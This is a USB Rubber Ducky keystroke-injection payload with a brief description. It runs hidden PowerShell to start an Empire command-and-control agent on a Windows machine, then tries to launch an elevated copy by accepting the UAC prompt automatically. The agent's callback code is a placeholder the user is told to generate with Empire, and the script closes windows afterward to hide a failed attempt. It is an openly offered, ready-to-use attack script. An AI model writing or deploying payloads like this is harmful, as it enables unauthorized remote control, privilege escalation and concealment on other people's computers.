A ducky payload that attempts to spawn an Empire agent directly with Admin privileges. Tested in Windows 7 & 10, should works fine even on slow PCs.
Generate the Powershell callback code with Empire Framework. Switch Base64 to “False” to decrease execution time.
DELAY 3000
GUI r
DELAY 1000
STRING cmd
ENTER
DELAY 2000
REM Launching a powershell empire agent in user's context
STRING powershell -W Hidden -nop -noni -c "Powershell Code"
ENTER
DELAY 200
GUI r
DELAY 1000
REM Trying to spawn an Empire agent with elevated privileges
STRING powershell Start-Process cmd -Verb runAs
ENTER
DELAY 2000
ALT y
DELAY 500
STRING powershell -W Hidden -nop -noni -c "Powershell Code"
ENTER
DELAY 500
REM Close all windows in case of privesc attempt failure
ESCAPE